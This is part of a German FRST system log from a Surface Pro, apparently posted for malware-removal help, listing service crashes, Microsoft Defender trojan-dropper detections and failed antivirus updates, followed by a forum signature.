Error: (02/05/2021 11:40:07 AM) (Source: Service Control Manager) (EventID: 7034) (User: )
Description: Dienst "Surface Display Color Service" wurde unerwartet beendet. Dies ist bereits 1 Mal passiert.
Error: (02/05/2021 11:40:07 AM) (Source: Service Control Manager) (EventID: 7031) (User: )
Description: Der Dienst "Realtek Audio Universal Service" wurde unerwartet beendet. Dies ist bereits 1 Mal vorgekommen. Folgende Korrekturmaßnahmen werden in 0 Millisekunden durchgeführt: Neustart des Diensts.
Windows Defender:
===================================
Date: 2021-02-05 09:18:37.4080000Z
Description:
Microsoft Defender Antivirus hat Schadsoftware oder andere potenziell unerwünschte Software erkannt.
Weitere Informationen:
https://go.microsoft.com/fwlink/?linkid=37020&name=TrojanDropper:Win64/Tnega!MSR&threatid=2147771646&enterprise=0
Name: TrojanDropper:Win64/Tnega!MSR
ID: 2147771646
Schweregrad: Schwerwiegend
Kategorie: Trojaner - Dropper
Pfad: file:_C:\Users\richa\AppData\Local\Temp\GetX64BTIT.exe
Erkennungsursprung: Lokaler Computer
Erkennungstype: Konkret
Erkennungsquelle: Echtzeitschutz
Benutzer: SURFACE\richa
Prozessname: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe
Sicherheitsversion: AV: 1.331.222.0, AS: 1.331.222.0, NIS: 1.331.222.0
Modulversion: AM: 1.1.17800.5, NIS: 1.1.17800.5
Date: 2021-02-05 09:11:51.0580000Z
Description:
Microsoft Defender Antivirus hat Schadsoftware oder andere potenziell unerwünschte Software erkannt.
Weitere Informationen:
https://go.microsoft.com/fwlink/?linkid=37020&name=TrojanDropper:Win64/Tnega!MSR&threatid=2147771646&enterprise=0
Name: TrojanDropper:Win64/Tnega!MSR
ID: 2147771646
Schweregrad: Schwerwiegend
Kategorie: Trojaner - Dropper
Pfad: file:_C:\Users\richa\AppData\Local\Temp\GetX64BTIT.exe
Erkennungsursprung: Lokaler Computer
Erkennungstype: Konkret
Erkennungsquelle: Echtzeitschutz
Benutzer: SURFACE\richa
Prozessname: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe
Sicherheitsversion: AV: 1.331.222.0, AS: 1.331.222.0, NIS: 1.331.222.0
Modulversion: AM: 1.1.17800.5, NIS: 1.1.17800.5
Date: 2021-02-05 08:33:24.5450000Z
Description:
Microsoft Defender Antivirus hat Schadsoftware oder andere potenziell unerwünschte Software erkannt.
Weitere Informationen:
https://go.microsoft.com/fwlink/?linkid=37020&name=TrojanDropper:Win64/Tnega!MSR&threatid=2147771646&enterprise=0
Name: TrojanDropper:Win64/Tnega!MSR
ID: 2147771646
Schweregrad: Schwerwiegend
Kategorie: Trojaner - Dropper
Pfad: file:_C:\Users\richa\AppData\Local\Temp\GetX64BTIT.exe
Erkennungsursprung: Lokaler Computer
Erkennungstype: Konkret
Erkennungsquelle: Echtzeitschutz
Benutzer: SURFACE\richa
Prozessname: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe
Sicherheitsversion: AV: 1.331.222.0, AS: 1.331.222.0, NIS: 1.331.222.0
Modulversion: AM: 1.1.17800.5, NIS: 1.1.17800.5
Date: 2021-02-04 16:22:28.8490000Z
Description:
Microsoft Defender Antivirus hat Schadsoftware oder andere potenziell unerwünschte Software erkannt.
Weitere Informationen:
https://go.microsoft.com/fwlink/?linkid=37020&name=Trojan:Win32/Wacatac.A!ml&threatid=2147735504&enterprise=0
Name: Trojan:Win32/Wacatac.A!ml
ID: 2147735504
Schweregrad: Schwerwiegend
Kategorie: Trojaner
Pfad: containerfile:_C:\Program Files (x86)\Steam\steamapps\common\Age Of Empires 3\bin\ESOCP3.dll; file:_C:\Program Files (x86)\Steam\steamapps\common\Age Of Empires 3\bin\ESOCP3.dll->[MSILRES:ESOCP3.Cheater.exe]
Erkennungsursprung: Lokaler Computer
Erkennungstype: FastPath
Erkennungsquelle: Echtzeitschutz
Benutzer: NT-AUTORITÄT\SYSTEM
Prozessname: C:\Program Files (x86)\TotalAV\SecurityService.exe
Sicherheitsversion: AV: 1.331.211.0, AS: 1.331.211.0, NIS: 1.331.211.0
Modulversion: AM: 1.1.17800.5, NIS: 1.1.17800.5
Date: 2021-02-04 16:07:42.8250000Z
Description:
Microsoft Defender Antivirus hat Schadsoftware oder andere potenziell unerwünschte Software erkannt.
Weitere Informationen:
https://go.microsoft.com/fwlink/?linkid=37020&name=TrojanDropper:Win64/Tnega!MSR&threatid=2147771646&enterprise=0
Name: TrojanDropper:Win64/Tnega!MSR
ID: 2147771646
Schweregrad: Schwerwiegend
Kategorie: Trojaner - Dropper
Pfad: file:_C:\Users\richa\AppData\Local\Temp\GetX64BTIT.exe
Erkennungsursprung: Lokaler Computer
Erkennungstype: Konkret
Erkennungsquelle: Echtzeitschutz
Benutzer: SURFACE\richa
Prozessname: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe
Sicherheitsversion: AV: 1.331.174.0, AS: 1.331.174.0, NIS: 1.331.174.0
Modulversion: AM: 1.1.17800.5, NIS: 1.1.17800.5
Date: 2021-01-29 12:59:59.8280000Z
Description:
Bei Microsoft Defender Antivirus ist ein Fehler beim Aktualisieren der Sicherheitsinformationen aufgetreten.
Neue Version der Sicherheitsinformationen:
%Vorherige Version der Sicherheitsinformationen: 1.329.3019.0
Update Source: Microsoft Update-Server
Sicherheitstyp: AntiVirus
Updatetyp: Voll
Benutzer: NT-AUTORITÄT\SYSTEM
Aktuelle Modulversion:
%Vorherige Modulversion: 1.1.17700.4
Fehlercode: 0x80240438
Fehlerbeschreibung: Unerwartetes Problem bei der Überprüfung auf Updates. Informationen zum Installieren von Updates oder zur Problembehandlung finden Sie unter "Hilfe und Support".
Date: 2021-01-25 18:25:11.5970000Z
Description:
Bei Microsoft Defender Antivirus ist ein Fehler beim Aktualisieren der Sicherheitsinformationen aufgetreten.
Neue Version der Sicherheitsinformationen:
%Vorherige Version der Sicherheitsinformationen: 1.329.2803.0
Update Source: Microsoft Update-Server
Sicherheitstyp: AntiVirus
Updatetyp: Voll
Benutzer: NT-AUTORITÄT\SYSTEM
Aktuelle Modulversion:
%Vorherige Modulversion: 1.1.17700.4
Fehlercode: 0x80070102
Fehlerbeschreibung: Der Wartevorgang wurde abgebrochen.
Date: 2021-01-25 18:25:11.5940000Z
Description:
Bei Microsoft Defender Antivirus ist ein Fehler beim Aktualisieren der Sicherheitsinformationen aufgetreten.
Neue Version der Sicherheitsinformationen:
%Vorherige Version der Sicherheitsinformationen: 1.329.2803.0
Update Source: Microsoft Update-Server
Sicherheitstyp: AntiVirus
Updatetyp: Voll
Benutzer: NT-AUTORITÄT\SYSTEM
Aktuelle Modulversion:
%Vorherige Modulversion: 1.1.17700.4
Fehlercode: 0x80070102
Fehlerbeschreibung: Der Wartevorgang wurde abgebrochen.
Date: 2021-01-18 07:03:26.4280000Z
Description:
Bei Microsoft Defender Antivirus ist ein Fehler beim Aktualisieren der Sicherheitsinformationen aufgetreten.
Neue Version der Sicherheitsinformationen:
%Vorherige Version der Sicherheitsinformationen: 1.329.2334.0
Update Source: Microsoft Update-Server
Sicherheitstyp: AntiVirus
Updatetyp: Voll
Benutzer: NT-AUTORITÄT\SYSTEM
Aktuelle Modulversion:
%Vorherige Modulversion: 1.1.17700.4
Fehlercode: 0x80240438
Fehlerbeschreibung: Unerwartetes Problem bei der Überprüfung auf Updates. Informationen zum Installieren von Updates oder zur Problembehandlung finden Sie unter "Hilfe und Support".
Date: 2021-01-15 01:17:26.7300000Z
Description:
Bei Microsoft Defender Antivirus ist ein Fehler beim Aktualisieren der Sicherheitsinformationen aufgetreten.
Neue Version der Sicherheitsinformationen:
%Vorherige Version der Sicherheitsinformationen: 1.329.2196.0
Update Source: Microsoft Update-Server
Sicherheitstyp: AntiVirus
Updatetyp: Voll
Benutzer: NT-AUTORITÄT\SYSTEM
Aktuelle Modulversion:
%Vorherige Modulversion: 1.1.17700.4
Fehlercode: 0x8024402c
Fehlerbeschreibung: Unerwartetes Problem bei der Überprüfung auf Updates. Informationen zum Installieren von Updates oder zur Problembehandlung finden Sie unter "Hilfe und Support".
CodeIntegrity:
===================================
Date: 2020-10-02 18:49:36.8290000Z
Description:
Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume3\Windows\System32\WindowManagementAPI.dll because the set of per-page image hashes could not be found on the system.
==================== Speicherinformationen ===========================
BIOS: Microsoft Corporation 235.3440.768 11.16.2020
Hauptplatine: Microsoft Corporation Surface Pro
Prozessor: Intel(R) Core(TM) i5-7300U CPU @ 2.60GHz
Prozentuale Nutzung des RAM: 53%
Installierter physikalischer RAM: 8109.03 MB
Verfügbarer physikalischer RAM: 3781.88 MB
Summe virtueller Speicher: 9389.03 MB
Verfügbarer virtueller Speicher: 5274.62 MB
==================== Laufwerke ================================
Drive c: (Local Disk) (Fixed) (Total:236.34 GB) (Free:67.95 GB) NTFS
\\?\Volume{9136cfa7-7815-430f-baa2-1abc0527dc33}\ (Windows RE tools) (Fixed) (Total:1.76 GB) (Free:1.12 GB) NTFS
\\?\Volume{977f738d-40a8-488d-a241-573062553c2e}\ (SYSTEM) (Fixed) (Total:0.25 GB) (Free:0.22 GB) FAT32
==================== MBR & Partitionstabelle ====================
==========================================================
Disk: 0 (Size: 238.5 GB) (Disk ID: 0B43EB89)
Partition: GPT.
==================== Ende von Addition.txt =======================
Viele Grüße
Gaudisismo |
Lesestoff: